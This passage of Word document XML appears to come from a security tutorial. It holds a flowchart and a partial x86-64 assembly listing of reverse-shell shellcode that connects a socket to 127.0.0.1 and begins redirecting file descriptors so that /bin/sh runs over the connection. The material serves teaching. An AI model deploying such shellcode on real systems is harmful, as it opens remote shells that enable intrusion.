                            </w:pPr>
                            <w:r>
                              <w:t>+----------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">      |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">      v</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>+----------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>| execve() |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>+----------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB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299.25pt;margin-top:.7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" filled="f" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>+----------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>| socket() |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>+----------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">      |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">      v</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>+----------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>|connect() |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>+----------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">      |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">      v</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>+----------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>|  dup2()  |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>+----------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">      |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">      v</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>+----------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>|  dup2()  |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>+----------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">      |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">      v</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>+----------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>|  dup2()  |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>+----------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">      |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">      v</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>+----------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>| execve() |</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                      <w:pPr>
                        <w:pStyle w:val="figures"/>
                      </w:pPr>
                      <w:r>
                        <w:t>+----------+</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1"/>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00112660">
        <w:t>.global _start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>.text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>_start:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>jmp next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>sh:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.ascii "/bin/sh"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>eol:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 0xff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>sockaddr:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>#AF_INET</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 0xff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.word 4391</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.space 4, 0xff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 127</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>next:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># socket(AF_INET, SOCK_STREAM, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sys_socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $41, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># AF_INET</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %edi, %edi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $2, %dil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># SOCK_STREAM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %esi, %esi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $1, %sil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># no arguments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %edx, %edx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># connect(fd, &amp;sockaddr, 16)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># it could be assumed that the fd is less than 2 bytes long</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># move the socket to first argument</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movl %eax, %edi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sys_connect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $42, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>leaq sockaddr(%rip), %rsi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>xorl %edx, %edx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># put zeroes in sockaddr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movq %rsi, %r8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>inc %r8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb %dl, (%r8)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>addq $3, %r8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movl %edx, (%r8)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sizof(struct sockaddr)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $16, %dl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># at this point rax could be -111 (connection refused)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># dupd2(fd, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %esi, %esi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sys_dup2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
